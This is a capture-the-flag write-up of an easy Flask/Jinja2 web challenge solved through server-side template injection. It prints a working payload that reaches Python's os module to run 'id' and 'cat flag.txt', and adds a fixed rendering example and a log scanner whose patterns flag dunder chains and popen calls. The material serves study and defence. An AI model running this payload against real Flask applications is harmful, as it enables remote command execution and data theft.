
Templated [WEB][EASY] Writeup


Challenge Description

Can you exploit this simple mistake?

SOLUTION

Click on the Start Instance button to start the challenge.

Then you are provided with a web address in the form <ip>:<port>. Copy it and open it in another tab or browser.
In my case it was http://46.101.92.17:31311

Homepage of the webapp:

The page shows only the message:

Site still under construction
Proudly powered by Flask/Jinja2

So the site itself tells us it is built with Flask/Jinja2.

Searching for Flask/Jinja2 exploits:

I started searching for Flask/Jinja2 exploits and came across:

  1. ssti in flask jinja2
  2. Server Side Template Injection with jinja2

Both describe the SSTI (Server-Side Template Injection) exploit.

Test exploit:

After modifying the provided URL to http://46.101.92.17:31311/{{41+41}}, I noticed that the response contained the evaluated result of the expression rather than the literal text.
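The "simple mistake" the challenge title hints at is rendering the requested path as template source instead of as data. The following is an added example, not the challenge's own code (which is not available) and not from the Flask or Jinja2 projects: it reconstructs the likely bug in plain Jinja2 (Flask's render_template_string behaves the same way) and places the fixed handler beside it. The ERROR_PAGE layout and the two function names are assumptions of this example.

```python
"""Vulnerable vs. fixed rendering of a "page not found" message with Jinja2.

Added example; the challenge's Flask code is not available, so this assumes
the likely bug: an error page whose template text is built by
string-formatting the requested URL path into it. Plain Jinja2 is used so it
runs without Flask; Flask's render_template_string behaves the same way.
"""
from jinja2 import Environment

# Assumed error-page layout; the {path} slot is filled by str.format below.
ERROR_PAGE = "<h1>Error 404</h1><p>The page '{path}' could not be found</p>"


def render_vulnerable(path: str) -> str:
    """The mistake: the request path is spliced into the template *source*.

    Anything in the path that looks like Jinja2 syntax ({{ ... }}, {% ... %})
    is parsed and executed by the engine with the application's context.
    """
    source = ERROR_PAGE.format(path=path)  # user input becomes template code
    return Environment(autoescape=True).from_string(source).render()


def render_fixed(path: str) -> str:
    """The fix: the template source is constant and the path is passed as data.

    The engine only ever sees '{{ path }}'; the user's text is emitted verbatim
    (HTML-escaped by autoescape) instead of being evaluated.
    """
    source = ERROR_PAGE.format(path="{{ path }}")  # constant template text
    return Environment(autoescape=True).from_string(source).render(path=path)


if __name__ == "__main__":
    probe = "{{41+41}}"  # the harmless probe used earlier in this writeup
    print("vulnerable:", render_vulnerable(probe))
    print("fixed:     ", render_fixed(probe))
```

With the probe from above, the vulnerable handler renders the number while the fixed one echoes the braces back unchanged; that difference is exactly what the test request in this writeup revealed, and keeping user input out of the template source (or, as defence in depth, rendering with jinja2.sandbox.SandboxedEnvironment) is what closes it.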

Then I came across a reference on gathering information through SSTI.

Creating the exploit:

I built up the payload

```
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
```

step by step.

(Screenshots: output of id; directory contents)

Exploit code:

```
http://46.101.92.17:31311/{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}
```

Format:

```
http://<Web app address>/{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}
```

This is how I got the flag.

Just replace <Web app address> with the web address you were provided. In my case it was http://46.101.92.17:31311

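Requests like the ones above leave an obvious trail in the web server's access log, because template delimiters and dunder attribute chains never belong in a legitimate URL path. The following is an added example, not part of this writeup or the challenge: a small scanner that percent-decodes each requested path and flags the indicators, run over constructed Common Log Format lines that mirror the probe and the attribute walk shown earlier. The regexes, indicator names and sample addresses are assumptions of this example.

```python
"""Spot template syntax in web-server access logs.

Added example, not part of the writeup or the challenge: a scanner that
URL-decodes each requested path and flags Jinja2 delimiters and the dunder
attribute walks used to reach Python internals from inside a template. The
log lines below are constructed samples in Common Log Format.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Common Log Format: host ident authuser [timestamp] "METHOD path PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Each indicator is something a legitimate URL path should never contain.
INDICATORS = {
    "jinja_expr": re.compile(r"\{\{.*?\}\}", re.S),   # {{ ... }}
    "jinja_stmt": re.compile(r"\{%.*?%\}", re.S),     # {% ... %}
    "dunder_attr": re.compile(r"__(?:class|mro|subclasses|globals|builtins|import)__"),
    "os_exec": re.compile(r"\b(?:popen|system|subprocess)\b"),
}

# Constructed sample log: one benign page load, the probe from this writeup
# (percent-encoded), an attribute walk, a static asset, and an encoded
# {% ... %} statement block.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET / HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2024:10:01:09 +0000] "GET /%7B%7B41+41%7D%7D HTTP/1.1" 404 210
10.0.0.5 - - [12/Mar/2024:10:02:31 +0000] "GET /{{request.application.__globals__}} HTTP/1.1" 404 230
10.0.0.9 - - [12/Mar/2024:10:03:00 +0000] "GET /static/style.css HTTP/1.1" 200 1400
10.0.0.5 - - [12/Mar/2024:10:03:44 +0000] "GET /%7B%25%20for%20i%20in%20range(3)%20%25%7D HTTP/1.1" 404 190
"""


def decode_path(raw_path: str) -> str:
    """Percent-decode twice so double-encoded payloads are seen in the clear."""
    return unquote(unquote(raw_path))


def scan_line(line: str):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if m is None:
        return None  # unparseable line; a real tool would count these separately
    path = decode_path(m.group("path"))
    hits = [name for name, rx in INDICATORS.items() if rx.search(path)]
    if not hits:
        return None
    return {
        "src": m.group("src"),
        "ts": m.group("ts"),
        "status": int(m.group("status")),
        "path": path,
        "indicators": hits,
    }


def scan_log(text: str) -> list:
    """All findings in a log, in file order."""
    return [f for f in map(scan_line, text.splitlines()) if f is not None]


def findings_by_source(findings: list) -> dict:
    """Count suspicious requests per client address to surface the probing host."""
    return dict(Counter(f["src"] for f in findings))


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']} {f['src']} {f['status']} {f['path']!r} -> {', '.join(f['indicators'])}")
    print(findings_by_source(found))
```

Decoding before matching matters: the probe arrives as %7B%7B41+41%7D%7D, so a pattern applied to the raw log line would miss it. Note also that the framework's own 404 handling is what makes the injected path reach the template engine, so a burst of 404s with decoded braces from one address is the signal to look for.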


This is how I solved this challenge.

Thank you for reading my writeup :)
I hope to see you in my next writeup.


This post is licensed under CC BY 4.0 by the author.